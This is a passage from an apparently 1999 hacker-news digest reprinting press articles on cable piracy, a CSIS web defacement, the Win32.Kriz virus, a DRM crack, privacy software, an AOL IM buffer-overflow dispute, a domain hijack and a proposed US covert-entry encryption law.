consumer to start paying for it. So far, about 16 percent have done so. ''It's an amnesty kind of deal,'' said John Fouhy, director of security for MediaOne in the Northeast. ''We don't consider it stealing or illegal. It's just not in our billing system.'' Fouhy declined to identify where the problem is most severe, saying he did not want to cast aspersions on any particular community. But he said it is more pronounced in urban areas with apartment buildings where people tend to move in and out a lot. MediaOne serves most of Eastern Massachusetts except for Boston, Brookline, and Braintree. ''Leafy suburbs tend to have lower unauthorized rates,'' Fouhy said. At a time when MediaOne is rapidly building a sophisticated network to carry high-speed Internet access and local phone service in addition to cable TV, the fact that thousands of people are getting cable for free cannot do the company's high-tech image any good. But Fouhy said he was not surprised by the numbers, given what companies in other parts of the country have found with similar audits. He said that some people are stealing the signal and in other cases are just taking advantage of MediaOne's failure to shut previous service off. He gave the example of someone in Cambridge who is paying for cable TV and moves out of the apartment. Rather than send a technician to the apartment to shut service off, Fouhy said, MediaOne and the companies it has acquired in recent years often leave service on for the tenant moving in. That way service can start immediately with little or no installation cost for both the consumer and the company. ''In most instances, people understand cable doesn't come with the house,'' Fouhy said. But apparently all too often the new tenant would just plug his cable wire into his TV set or videocassette recorder and start watching CNN. Fouhy said the survey began in March and is scheduled to end in October and then resume again next year. It has focused mostly on communities where ''churn'' - turn-ons and turn-offs of cable service - is high or where cable penetration seems unusually low. In those communities, Fouhy said, MediaOne has hired contractors to go street by street to check whether noncustomers are receiving cable TV service. Fouhy said the surveyors do not go inside homes. The MediaOne survey is not designed to track down people who are using black boxes to illegally pirate premium cable channels, a problem that Fouhy described as ''significant.'' Industrywide, he said, cable companies are losing more than $5 billion a year in pirated premium and pay-per-view channels. MediaOne officials declined to comment on what tactics they are using to eliminate this fraud. In such an extensive audit, accidents apparently happen. Susanna Joannidis of Cambridge, who owns a single-family home and is up-to-date on her monthly MediaOne bill, said she and a neighbor lost their cable service early last month. It took almost two days to figure out that a technician had shut off the wrong service, causing Joannidis to miss the finals of Wimbledon that she had been eagerly anticipating. Joannidis said she thought it was strange that MediaOne does not know who its customers are. MediaOne sent Joannidis a letter of apology and gave her a $110 credit. This story ran on page A01 of the Boston Globe on 08/18/99. © Copyright 1999 Globe Newspaper Company. -=- MediaOne Sting Operation Nabs Web-Based Cable Pirates; Moreno Valley Police Department Raid Nets More Than $1 Million in Illegal Equipment EL SEGUNDO, Calif., Aug 18, 1999 (BUSINESS WIRE via COMTEX) -- OnWednesday, MediaOne(R) and the Moreno Valley Police Department executed three early-morning search warrants, raiding private homes in Riverside County, Calif., and uncovering evidence of a multimillion-dollar national cable-piracy operation that had been conducted over the Internet. The raid netted more than a million dollars' worth of "black boxes," the descrambling device that enables users to illegally access cable-TV channels, as well as master computer chips that could be cloned for new black boxes, and shipping and billing evidence. Charles Balan, 28 years old, of Romoland, Calif., and Brian Fulk, 24 years old, of Moreno Valley, were arrested and are facing felony charges. A third suspect is still at large. The extensive computer equipment from their operations, called Cable Converter Concepts and Hi-Tech Converter Labs, was confiscated, and their Web sites were shut down. Theft of service is one of the biggest problems faced by cable companies today. It is estimated that this criminal activity costs the industry and its customers more than $5.8 billion annually. Not only is this cost passed on to honest customers, but the quality of their service is also diluted by the illegal hardware. Cities themselves also lose millions in franchise fees -- the monthly, subscriber-based revenues paid to them by cable-TV companies. "The success of today's operation is a perfect example of what occurs when you have a cooperative effort between private industry and law enforcement," said Sgt. Joseph Cleary, supervisor in charge of the search-warrant execution. "We're getting the message out that we won't tolerate this kind of criminal activity," said Mike Bates, director of security for MediaOne. "Abuse of e-commerce via the Internet is a nationwide problem that affects cities, companies and private citizens alike." MediaOne Group (NYSE:UMG) is one of the world's largest broadband-communications companies, bringing the power of broadband and the Internet to customers in the United States, Europe and Asia. The company also has interests in some of the fastest-growing wireless-communications businesses outside the United States. For 1998, the businesses that constitute MediaOne Group produced $7.1 billion in proportionate revenue. On May 6, 1999, the company entered into an agreement to merge with AT&T. Copyright (C) 1999 Business Wire. All rights reserved. @HWA 44.0 CSIS Admits Web Defacement ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest The Canadian Security Intelligence Service has admitted that its web page had been defaced back in 1996. The spy agency admitted that its web page had been changed to read "Canadian Security Illegal Service". CSIS admitted what had occurred in a recent paper released by the agency that discuss cyber warfare. Globe Technology http://www.globetechnology.com/archive/gam/News/19990818/UTERRN.html Andover News http://www.andovernews.com/cgi-bin/news_story.pl?28513/topstories Hackers altered its Web page, CSIS reports Terrorists could cripple societies, start wars by invading cyberspace, spy agency warns JEFF SALLOT Parliamentary Bureau Wednesday, August 18, 1999 Ottawa -- Computer hackers altered the logo on the Canadian Security Intelligence Service's Web page to read "Canadian Security Illegal Service" within days of the site going up on the Internet, the spy agency says. This act of cyberspace vandalism was quickly cleaned up, and there is no evidence the hackers ever got into the agency's top-secret internal computer network, CSIS says. But the incident is a warning about how hackers can manipulate data from long distances, CSIS says in a new background paper describing trends in international terrorism and warning that cyberattacks might cripple modern societies. The background paper was released yesterday and is the service's first public disclosure of the 1996 incident involving its own Web page. CSIS spokesman Dan Lambert said the Web sites of several other federal government departments were also hit at about the same time. An investigation was conducted, but CSIS will not disclose the results. The background paper warns that as modern countries become increasingly dependent on computer-based communication, "future wars could involve cyberattacks on information infrastructure." Canada is particularly vulnerable because of its heavy reliance on these advanced technologies. "If teenagers can compromise networks using basic skills and tools available on the Internet, the concern is what can be accomplished by terrorist groups or states with far greater resources and motivation," the paper says. The paper says that the Web site of the Irish Republican Army openly discusses ways it could use so-called information operations to attack British interests. A support group for Tamil terrorists took responsibility for attacking the E-mail system of Sri Lankan diplomatic missions in Washington and New York two years ago. "On the World Wide Web, distance is not a factor. . . . We are as vulnerable as any other country and have more assets at risk than most," the paper says. CSIS, like other sensitive government agencies, almost certainly protects its secret computer systems by physically segregating them from any connection to the Internet, commented Peter Davis, a computer-security consultant. Mr. Davis said that terrorist attacks in cyberspace are going to become more frequent as groups become more sophisticated in the use of technology. Even some of the most sophisticated military communications systems appear to be vulnerable. Military sources have said the Canadian Forces lost key computer links with 10 military allies for 24 hours during a simulated cyberterrorist attack last year. A Canadian team working in Britain penetrated military networks as far away as Australia. -=- Canadian Security Agency Warns Against Cyber-Attack OTTAWA, ONTARIO, CANADA, 1999 AUG 18 (Newsbytes) -- By Martin Stone, Newsbytes. Canada'a central security agency, the Canadian Security Intelligence Service (CSIS) has issued a warning against global terrorism, citing hackers and crackers, those who penetrate secure computer systems, as a growing threat. In a background paper released Thursday, CSIS admits that crackers entered their Website in 1996 and altered their logo by changing the word "Intelligence" to "Illegal." In this first public disclosure of the incident, the agency says the damage was quickly discovered and corrected, but the event serves as an example of how cyber-savvy terrorists may be able to tamper with mission-critical systems. The paper gives a brief outline of terrorist activities of the past and suggests that insurgents could severely cripple societies and even start wars by invading and taking control of the critical computer components. The CSIS site was cracked within days of its having gone live, but the agency says there is no evidence that any sensitive files were entered. CSIS spokesman Dan Lambert told Newsbytes that the site is in the public domain and is in no way connected to other CSIS computer systems, adding that the server is not even located on the CSIS premises, but housed at Canada's Department of Public Works. He said the Websites of several other federal government departments were also invaded at about the same time. Since then, there have been several instances of federal and provincial government Websites being cracked, however no serious outages or security breaches have occurred. The study hints that, as modern civilizations become more dependent on computers and connectivity, future wars could be fought in cyberspace. Canada is known to be particularly vulnerable due to a heavy reliance on advanced technologies, as has been reported recently by Newsbytes and other media. The backgrounder says: "If teenagers can compromise networks using basic skills and tools available on the Internet, the concern is what can be accomplished by terrorist groups or states with far greater resources and motivation." The paper also states: "Terrorist methods continue to become more sophisticated, both in terms of technology and the exploitation of public opinion and media channels. Globally mobile and knowledgeable about communications, explosives technology and computers, they have contacts around the world. Their activities and targets are difficult to predict. The use of technology, always part of the terrorist arsenal, has been augmented by encryption and the Internet to facilitate communication and reach a wider audience. "In addition, the growing dependence of states on computer-based communication and technologies is leading to a world in which future conflicts could involve activities in cyberspace and attacks on a state's information infrastructure, now commonly referred to as information operations. As one of the world's most advanced states in its reliance on information technologies, Canada is concerned about its vulnerability to this threat. "We are already seeing indicators of the changing threat environment in this area. One of the IRA Websites openly discusses ways it could use information operations to attack British interests. In the summer of 1997, a group linked to the Liberation Tigers of Tamil Eelam claimed responsibility for an attack on the e-mail systems of the Sri Lankan Embassy in Washington and its Mission in New York. "If a Website is successfully hacked into, data on the site can be manipulated. As an example, the CSIS Website was hacked into and a few words changed on the home page. On the World Wide Web, distance is not a factor. Canada's geographic location and the world's longest undefended physical border provide no natural protection against these kinds of attacks. We are as vulnerable as any other country and have more assets at risk than most." Analysts suspect that cyber-terrorist attacks will become more frequent as groups grow more sophisticated in the use of technology. The full text of the backgrounder can be found at http://www.csis-scrs.gc.ca @HWA 45.0 Win32.Kriz Set To Go Off Christmas Day ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague A new virus set to hit on Christmas day could be more devastating than the CIH virus. The virus, which has been described as being "very well written", kills the CMOS memory, overwrites data on all available drives, and destroys the flash BIOS using the same method the Chernobyl virus used. Luckily, computer users will have until December 25 to buy or update their anti-virus software. The virus only infects users of Microsoft Windows. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2316716,00.html?chkpt=hpqs014 -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- 'Christmas' virus can destroy PCs By Bob Sullivan, MSNBC August 18, 1999 3:00 PM PT URL: A nasty new virus discovered by researchers promises to do even more damage to victims than the Chernobyl virus. It has the ability not only to erase files, but also to render a PC useless by destroying its flash BIOS. The good news is it won't execute until Dec. 25; the bad news is PC users without anti-virus programs may have a very bad Christmas Day. The author of Win32.Kriz, discovered recently by researchers, sounds as if he or she has an ax to grind against religious folks. Inside the virus is a text string with a poem full of expletives criticizing those who preach religion: "I don't wanna hear it, coz I know none of it's true," the author writes, according to anti-virus research firm Kaspersky Lab. Victims of the virus -- who can be anyone using Windows 95, Windows 98 or Windows NT -- can expect a load of trouble. The virus kills the CMOS memory, overwrites data in all files on all available drives, and then destroys the flash BIOS by using the same routine that was found in the "Win95_CIH" virus, also known as Chernobyl. "This is a nasty one, very well written," said Dan Takata of anti-virus vendor Data Fellows Inc. He said it's too early to tell if the virus will be widespread -- but potential victims have until Dec. 25 to update their antivirus programs against it. @HWA 46.0 MS Windows Media Audio Broke One Day After Release ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by darktide Microsoft recently released Windows Media Audio, a audio format set to compete against MP3. The difference is the WMA has security features built in to force people to pay for the music they listen to. One day after the release of this format cracking programs like unfuck.exe and AudioJacker where available to defeat this technology. Microsoft is working on a fix. C|Net http://www.news.com/News/Item/0,4,40672,00.html?st.ne.fd.gif.f Windows Media hits sour note By Jim Hu and Michael Kanellos Staff Writers, CNET News.com August 18, 1999, 4:45 p.m. PT A day after Microsoft released its new Web music technology, the company confirmed that crackers have already developed a program to strip away the security behind it. Microsoft acknowledged that the executable file, dubbed "unfuck.exe," exists and works. In fact, there are a number of programs, such as Audiojacker, that perform similar functions. "This one just has a glitzier name," said a Microsoft spokesman, adding that the company is working on a fix. Normally, only the user who downloads and pays for a song encrypted in Microsoft's Windows Media Audio 4 technology can listen to it. But with the new exploit, someone who pays for the song also can email it to friends who want to hear or copy it. The program works by rerecording musical tracks in an unprotected format. To take advantage of the program, a would-be pirate has to buy and download music. During the downloading process, the executable intercepts the music and reformats it into a different format that doesn't have embedded security elements. Copies can then be made freely. Windows Media Audio is Microsoft's answer to the numerous audio compression formats that have gained popularity in the last year. These technologies allow users to download music off the Web and play it back. MP3 is one technology that has gained considerable popularity. Although piracy is theft and represents lost potential revenue, observers say the record industry has historically overplayed the threat. Pirated copies of software or music, especially among hobbyists, will always crop up. Recently the Recording Industry Association of America, which represents the major U.S. record companies, has acknowledged this publicly. "We'll always have piracy of cassettes and CDs, for instance, with the flea markets or street vendors. That will never go away, and I think the same will be true of the Internet," Hilary Rosen, chief executive of the RIAA, said in an earlier interview. "But we're going to see an explosion of legitimate music online. And consumers are going to have an alternative. I believe consumers will want the alternative." Some analysts agree that consumers tend to gravitate toward buying legitimate copies. "The piracy threat is a bit overblown at the present time," said Mark Hardie, senior analyst at Forrester Research. "There will be levels of piracy that will be unavoidable...You will always have code somewhere in cyberspace that will hack through encryption." He added that it is easier to trace the source of pirated copies of digital music than copies made from traditional methods of recording. That means it likely will be easier to stop illegal copying in the future than it is today, he said. Windows Media is a group of technologies for multimedia playback. Besides Windows Media Audio, the package includes Windows Media Player and software and services including Windows Media Services, Windows Media Tools, and a software development package. The Windows Media Audio exploit was first reported on the pro-MP3 Dimension Music site. @HWA 47.0 Available Soon, Freedom! ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by jordan Zero-Knowledge Systems, the Montreal-based start-up, is set to release Freedom, which is a comprehensive Internet privacy package that offers multiple online pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge couldn't crack if it wanted to. Freedom 1.0 for Windows is set for release in late October or early November. CNN http://www.cnn.com/TECH/computing/9908/18/freedom/index.html Zero Knowledge Systems http://www.zks.net/clickthrough/click.asp?partner_id=542 Total digital privacy may be on the horizon August 18, 1999 Web posted at: 5:32 p.m. EDT (2132 GMT) By Robin Lloyd CNN Interactive Senior Writer (CNN) -- If American software developers were to touch any of the code in the 10,000 released beta versions of an Internet privacy solution that is getting good preliminary marks, they would be subject to prosecution. In fact, if Zero-Knowledge Systems were based in the United States, it would be illegal for the company to export its Internet privacy software, dubbed 'Freedom.' Instead, the Montreal-based start-up, headed up by 26-year-old Austin Hill, is set to release the first product of its kind -- a comprehensive Internet privacy package that offers multiple online pseudonyms and Byzantine encrypted rerouting that even Zero-Knowledge couldn't crack if it wanted to. No more cookies, e-mail trails and digital identity stealing. At least, that's the idea. More than a dozen "cookie killers" already exist, along with several e-mail and browser anonymity services such as anonymizer.com. Those all rely on what Hill calls a "trust-me" mechanism. A third party server holds users' identity and data. Freedom makes it so the end-user has sole possession of that data. "If there was a gun to my head, I still could not reveal or break the privacy of my users," Hill says. The user has the only "key" to their pseudonyms, which can be linked to independent e-mail addresses, geographic locations and encryption keys. Freedom is designed to protect the e-mail, chats, browsing and newsgroup searches of anyone from a Chinese dissident posting pro-democracy messages to an employee checking out listings for Alcoholics Anonymous. The software can encrypt private chats and newsgroup discussions, ensures anonymous Web browsing and can even block spam, Hill says. Each digital identity relies on full strength encryption that ranges from 128 to 4,096 bits. Freedom 1.0, which works only on Windows platforms, is set for release in late October or early November. It will be downloadable for $49.95. Macintosh and Linux versions are due out next year. Freedom doesn't work with America Online, however, since AOL is an online service separate from the Internet. Zero-Knowledge released 1,000 beta copies of Freedom at the DefCon 7 convention in Las Vegas last month. Since then, it has released thousands more via its Web site. A total of 50,000 people have requested copies since then. How it works Web users leave traces of their identity behind every time they visit a Web site or send e-mail. To get a sense of the process, visit the Center for Democracy and Technology's site and use its demo. Freedom allows users to set up separate pseudonyms for different aspects of their lives -- an identity for an online chat about health care, another for interactions with friends and family, others for Internet browsing and finally a 'true' identity for e-commerce. Zero-Knowledge is working on an e-commerce identity protection solution for future versions. Freedom scrambles data coming from a user's PC and hides the source and destination of Internet traffic routed through the service. The message or data packet is first sent to Zero-Knowledge's servers where it is wrapped in a layer of encryption. That initiates a delivery process where the data bounces from one independently owned relay station to the next and can only be opened by one specific user who then forwards it to another specific user, with that process repeating several times. Eventually a data packet goes to its intended target but neither snoopers, nor the final recipient, have any way of tracing its origins. Third-party protections, the approach relied upon by Freedom's predecessors, can be hacked or bought away when the company makes a new acquisition, as was the case when Double Click acquired Abacus, Hill said. Or, civil lawsuits can force ISPs to turn over their records. Freedom gets high marks David Sobel, general counsel for the Electronic Privacy Information Center, and Ari Schwartz, a policy analyst with the Center for Democracy and Technology, agree that Freedom is a good solution. "I suspect that it is one of the best solutions that we've seen," Sobel said. Freedom's strength comes from Hill's philosophical commitment to preserving privacy and anonymity on the Internet, Sobel said. Schwartz underlined the Center's stance on Internet privacy -- software solutions combined with self-regulation among service providers and legislation will be needed to protect privacy online. The U.S. Congress has introduced several bills this session relating to online privacy but advocates say they may not go far enough. A CDT report concludes that online privacy is the exception, not the rule, in the private sector. U.S. encryption policy has its pros and cons The U.S. policy that prohibits encryption exports and labor is based on protecting security codes produced and cracked by the FBI and other national security agencies. The downside is that we may lose out on what has turned into a $1.5 billion cryptography business for Canada, where limits are less strict, Hill says. The U.S. approach could backfire and result in a brain drain of encryption experts, EPIC's Sobel said. "The end result will be that American companies will lose leadership in this field," he said, "and it is not going to result in encryption being out of the hands of anyone our government might be concerned about." @HWA 48.0 Is AOL hacking IM users? ~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by D----Y; http://www.zdnet.com/filters/printerfriendly/0,6061,2316917-2,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Is AOL hacking IM users? By David Raikow, Sm@rt Reseller August 18, 1999 3:04 PM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2316917,00.html As the Instant Messaging war rages on, evidence is mounting that suggests America Online Inc. is using a security hole in its own software to lock out IM clones. While security experts are still examining IM logs to determine precisely what is going on, it looks like AOL's tactics may have put its own users at serious risk. The first hint of a problem came last Wednesday, when an individual identifying himself as "Phil Bucking" of "Bucking Consulting" sent an e-mail to PharLap Software President Richard Smith warning of a "buffer overflow" vulnerability in the AOL IM client. Smith, a noted security expert, quickly determined that the e-mail had been falsified, and had almost certainly come from within Microsoft. Microsoft has flip-flopped on whether or not the e-mail message actually came from one it its employees. Because of the identity question, the allegations of "Mr. Bucking" initially garnered little serious attention. On Monday, however, Robert Graham, chief technical officer with Network Ice Software, a software security firm, released a detailed analysis of the AOL IM logon procedure, which suggests a vulnerability almost identical to that described by "Bucking". A very serious threat The security community is now taking the threat very seriously. "Buffer overflow" vulnerabilities allow an intruder to trick a susceptible machine into executing code by sending it more information than it is configured to receive. These attacks require a great deal of technical knowledge to develop, but are often automated with script tools and used to compromise network servers by skilled hackers and "script kiddies" alike. While emphasizing that the evidence is still preliminary, PharLap's Smith said he believes that AOL has been using this technique to trigger specific responses from its IM clients. Because Microsoft's IM clients do not have this bug, AOL servers can identify them, and lock them out of the system. This bug has only been observed on Windows clients; it is not clear how other platforms are affected. Smith said he sees this as a very serious potential threat to users. As Microsoft continually updates its clients, AOL must keep introducing new variations on the buffer overflow to stay ahead. "It's only a matter of time before they make a mistake, and machines running AOL IM start crashing all over the Net," Smith predicts. Smith added that the hole gives AOL an extraordinary amount of power over users' machines. "Remember that this is a technique normally used by hackers to break into machines. The current use seems pretty benign, but AOL can use this to execute any arbitrary code on a Windows machine -- run software, leave backdoors, whatever. What happens if a disgruntled AOL employee finds a use for this?" Smith warned. Larger potential danger Graham said he concurs with Smith's assessment, though he sees an even larger potential danger: "If hackers managed to masquerade as an AOL server, they could do anything to the target machine. This could be a real problem for cable modem and DSL users, who have 24-hour connections and are vulnerable to 'man-in-the-middle' attacks." Graham noted that such attacks are unlikely in the near future because of the technical expertise required, but are a very real possibility. AOL did not respond to requests for comment on these latest charges by press time. @HWA 49.0 Anti-gay site is hacked ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by deepquest In what appears to be a simple internic spoof the registration information for godhatesfags.com was changed to the owner of godlovesfags.com. It is unknown if the first domain became unregistered or if the perpetrator somehow fooled Network Solutions into changing the information. Unfortunately it does not appear that anyone who has written a 'news' article about this has any idea how the internet works, making it hard to determine exactly what happened. Hackers reverse message on anti-gay Web site August 19, 1999 Web posted at: 5:22 p.m. EDT (2122 GMT) By Robin Lloyd CNN Interactive Senior Writer (CNN) -- Hackers switched the message from hate to love on a notorious anti-gay site on the Internet. A 2-year-old Web site www.godhatesfags.com put up by Pastor Fred Phelps' Westboro Baptist Church in Topeka, Kansas, was hacked Wednesday to re-route visitors to www.godlovesfags.com, featuring a pink and purple pro-gay banner, links to gay news Web sites and a quote from Ellen DeGeneres. "Hate will not be tolerated on the Internet," said Kris Haight on Thursday. Haight says he registered the domain name for the pro-gay site more than a year ago and gave the OK for the re-routing within the past two days. "Phelps teaches hate and a lot of it is untrue. People who go to their site and want to find hate aren't going to find it, at least until he gets the domain back." The pro-gay site, usually visited daily by only a handful of people, got 8,000 hits in the past 24 hours, Haight said. The pages were written by Rich Macky of Omaha, Nebraska, Haight said. The switch did not show up on all computers Thursday as it takes time for the re-routing to take effect on servers worldwide. Phelps' daughter, Shirley Phelps-Roper, said the hack is just one of more than a dozen tricks played on the church's Web site in the past two years. "No, my dear, it's not all that drastic," she told CNN Interactive. "It's just another fag ploy to try to bury the truth of God and the Earth. It's a temporary inconvenience." Phelps-Roper, who also serves as the church's attorney, said it would take a couple days of paperwork on her end to correct the re-routing. Fred Phelps, whose congregation regularly engages in anti-homosexual picketing, demonstrated at the funeral of Matthew Shepard, a 21-year-old gay man who was savagely beaten to death in a Wyoming hate crime. Hacker hit DNS Haight said he didn't know who originated the hack, which involves re-routing godhatesfags.com visitors via the Domain Name System, a network of servers which translates alphabetic domain names into numeric IP, or Internet Protocol, addresses. Haight, a 22-year-old gay man living in Newport, New Hampshire, said he registered the pro-gay domain name a year or so ago when he found out about Phelps site, which he says he found disgusting. He recently received an anonymous e-mail advising him to watch the Internet contact information for his site. Wednesday, Haight got a chance to change that information. "I set up the server to point godhatesfags to godlovesfags," he said. Later, he received another e-mail saying the address swap worked. Haight is part of a group of Internet denizens known as Mindsprung, a play on the popular Internet service provider Mindspring. Haight owns domain names for a couple other Web sites, including www.gaycollegeboys.com, an IRC chat discussion page. Phelps-Roper said the 100-member church has been forced to switch servers a few times due to all the digital attacks on the site. The church sponsors another Web site -- godhatesamerica.com. "We're busy people, not thwarted or detracted by one more assault on our ministry," she said. "It's like 'ho hum.'" @HWA 50.0 Indonesian CyberWar? Or Not? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue On Wednesday Nobel Peace Prize laureate Jose Ramos-Horta claimed that hundreds of people around the world were poised to launch a cyber attack against Indonesia should there be any tampering in the election process for East Timor's freedom. Yesterday HNN cast grave doubts on this claim having seen absolutely no evidence to support it. Connect Ireland, the ISP that hosts the virtual top level domain of .tp for East Timor has released a press release also saying that they have not seen nor heard of any preparations for any electronic retaliation. C-I also urges all people to leave the internet for communication and not to attack other peoples freedom of speech via the internet. San Jose Mercury News - Story on Jose Ramos-Horta's statements http://www7.mercurycenter.com/premium/world/docs/cyberwar19.htm HNN Archive for August 19, 1999 http://www.hackernews.com/archive/arch.html?081999#2 Press Release from Connect Ireland http://www.hackernews.com/orig/conire.html Press Release - from Connect - Ireland Communications Ltd. 4.30pm GMT, Thursday 19th August 1999, Dublin. Connect-Ireland's response to the call for Cyber War against Indonesia. In a number of recent international newspapers, articles have appeared quoting Ramos Horta in the context of the threat of the use of cyberwarfare against Indonesia. There are some points I would like to make to correct some of the content in these articles. The attack on us - which was a culmination of attacks over 9/10 months was NOT directed at a web site - but at the cctld - top level domain - for East Timor (.tp) - and therefore much more serious than stated.. During the course of the attack, we established that the perpetrators had a full domain registry with them and were endeavouring to establish spurious domains - which we can but assume were for neferious purposes and presumably these would reflect badly on the Call for Freedom by the East Timorese. Our activities and initiatives have established East Timor's virtual independence, at least as far as the Internet is concerned. After the attack we received many positive offers of support and assistance. The offers also included possible revenge attacks against Indonesia - which we stated categorically that we did not want or condone. We have not heard from anyone in the current call for such action by Ramos Horta either in the Irish Internet community or any other location. If we had heard of such a potential action, C-I would have endeavoured to dissuade the use of such options and activities and hopefully would have directed the interest and intellectual capacity to more fruitful channels. I would like to make our position extremely clear. We do not condone attacks of any kind on the Internet or other similar technologies. We believe in the freedom of speech and in everyone's ability to conduct their communication for their own legitimate purposes. We (C-I) believe there is more to be gained by maintaining the opportunities that can be developed through free speech than in conducting cyberwarfare. I would also like to add that after the attack on us, we received support from many Indonesians - who translated our statement(s) into the many languages that are used within that territory and circulated these widely. We (C-I) are NOT at war with the Indonesian People. We were completely unaware of the proposed activity as given by Horta. We have not been approached in recent months by anyone who has stated that they wished to participate in an activity of this nature. The response that we received after the attack from the 'hacker' cyber community was all very anti cyber terrorism. Since the beginning of this year, we have been informed on good authority that over 5000 East Timoreans have been killed. In this light, I can perceive that leading activists in the cause for East Timor are under considerable pressure and this will continue until the implementation of full and open democratic processes are in place in East Timor. To my mind Ghandi would have made a much better Internet strategist than Hitler. Connect-Ireland believes in the freedom of speech. We believe that all lines of communication should always be kept open as there is more to gain through this process. I can think of no better environment for managing "Jaw- Jaw rather than War-War" - than the Internet. Martin Maguire Project Director Connect-Ireland Communications Ltd. 19th August 1999 Connect-Ireland Communications Ltd., 20 Mark St., Dublin 2 Tel:+353-1-6706701 Fax:+353-1-6790089 Mob.+353-86-UCALLME URL: http://www.connect.ie -Internet for Everyone- 51.0 Gov Wants to Break Into to Personal Computers, Legally ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague A proposed 'Cyberspace Electronic Security Act,' would give the DoJ additional powers to break into personal computers. The DoJ memo dated August 4, would allow the government to disable encryption on the machines and to gather passwords. Washington Post http://www.washingtonpost.com/wp-srv/business/daily/aug99/encryption20.htm CNN http://www.cnn.com/TECH/computing/9908/20/computer.codes.ap/index.html Yahoo News http://dailynews.yahoo.com/h/nm/19990820/ts/technology_covert_2.html Justice Department Mulls Covert-Action Bill By Robert O’Harrow Jr. Washington Post Staff Writer Friday, August 20, 1999; Page A1 The Justice Department wants to make it easier for law enforcement authorities to obtain search warrants to secretly enter suspects' homes or offices and disable security on personal computers as a prelude to a wiretap or further search, according to documents and interviews with Clinton administration officials. In a request set to go to Capitol Hill, Justice officials will ask lawmakers to authorize covert action in response to the growing use of software programs that encrypt, or scramble, computer files, making them inaccessible to anyone who does not have a special code or "key," according to an Aug. 4 memo by the department that describes the plan. Justice officials worry that such software "is increasingly used as a means to facilitate criminal activity, such as drug trafficking, terrorism, white-collar crime, and the distribution of child pornography," according to the memo, which has been reviewed by the Office of Management and Budget and other agencies. Legislation drafted by the department, called the Cyberspace Electronic Security Act, would enable investigators to get a sealed warrant signed by a judge permitting them to enter private property, search through computers for passwords and install devices that override encryption programs, the Justice memo shows. The law would expand existing search warrant powers to allow agents to penetrate personal computers for the purpose of disabling encryption. To extract information from the computer, agents would still be required to get additional authorization from a court. The proposal is the latest twist in an intense, years-long debate between the government and computer users who want to protect their privacy by encrypting documents. Although Justice officials say their proposal is "consistent with constitutional principles," the idea has alarmed civil libertarians and members of Congress. "They have taken the cyberspace issue and are using it as justification for invading the home," said James Dempsey, senior staff counsel at the Center for Democracy and Technology, an advocacy group in the District that tracks privacy issues. Police rarely use covert entry to pave the way for electronic surveillance. For example, federal law enforcement agencies obtained court approval just 34 times last year under eavesdropping statutes to install microphones, according to the 1998 wiretap report issued by the Administrative Office of the Unites States Courts. David L. Sobel, general counsel at the Electronic Privacy Information Center, predicted the number of secret break-ins by police would soar if the proposal is adopted because personal computers offer such a tantalizing source of evidence for investigators -- including memos, diaries, e-mail, bank records and a wealth of other data. "Traditionally, the concept of 'black bag' jobs, or surreptitious entries, have been reserved for foreign intelligence," Sobel said. "Do we really want to alter the standard for physical entry?" The proposal follows unsuccessful efforts by FBI Director Louis J. Freeh and other Justice officials to secure laws requiring computers or software to include "back doors" that would enable investigators to sidestep encryption. Those proposals, most notably one called Clipper Chip, have been criticized by civil libertarians and have received little support in Congress. In a snub of the administration, more than 250 members of Congress have co-sponsored legislation that would prohibit the government from mandating "back doors" into computer systems. "We want to help law enforcement deal with the new technologies. But we want to do it in ways that protect the privacy rights of law-abiding citizens," said Rep. Robert W. Goodlatte (R-Va.), who originally sponsored the legislation, known as the Security and Freedom Through Encryption Act. Goodlatte said the Justice Department's proposal might upset the "very finely tuned balance" between law enforcement power and civil liberties. But Justice Department officials say there is an increasingly urgent need for FBI agents and other federal investigators to get around encryption and other security programs. "We've already begun to encounter [encryption's] harmful effects," said Justice spokeswoman Gretchen Michael. "What we've seen to date is just the tip of the iceberg." The proposed law also would clarify how state and federal authorities can seek court orders to obtain software encryption "keys" that suspects might give to others for safekeeping. Although few people share such keys now, officials anticipate that they will do so more often in the future. Administration officials played down the potential impact on civil liberties. In interviews, two officials said the law would actually bolster privacy protections by spelling out the requirements for court oversight of cyber-surveillance and the limits on how information obtained in a search could be used. "The administration is supportive of encryption. Encryption is a way to provide privacy, but it has to be implemented in a way that's consistent with other values, such as law enforcement," said Peter P. Swire, the chief White House counselor for privacy. "In this whole debate, we have to strike the right balance." Computer specialists predict that people under investigation will take countermeasures. "It's 'Spy vs. Spy,' " said Lance Hoffman, director of the Cyberspace Policy Institute at George Washington University, who praised the administration for raising the issue but expressed skepticism about the proposal as it was described to him. "I'd be leery if I were the government. . . . They have to be real careful," he said. © 1999 The Washington Post Company -=- CNN; Feds want authority to secretly crack personal computer codes August 20, 1999 Web posted at: 12:49 a.m. EDT (0449 GMT) WASHINGTON (AP) -- The Clinton administration reportedly plans to ask Congress to give police authority to secretly go into people's personal computers and crack their security codes. Legislation drafted by the Justice Department would let investigators get a sealed warrant from a judge to enter private property, search through computers for passwords and override encryption programs, The Washington Post reported Friday. The newspaper quoted an August 4 department memo that said encryption software for scrambling computer files "is increasingly used as a means to facilitate criminal activity, such as drug trafficking, terrorism, white-collar crime and the distribution of child pornography." Under the measure, investigators would obtain sealed search warrants signed by a judge as a prelude to getting further court permission to wiretap, extract information from computers or conduct further searches. Privacy advocates have objected to the plan, dubbed the Cyberspace Electronic Security Act by the Justice Department. "They have 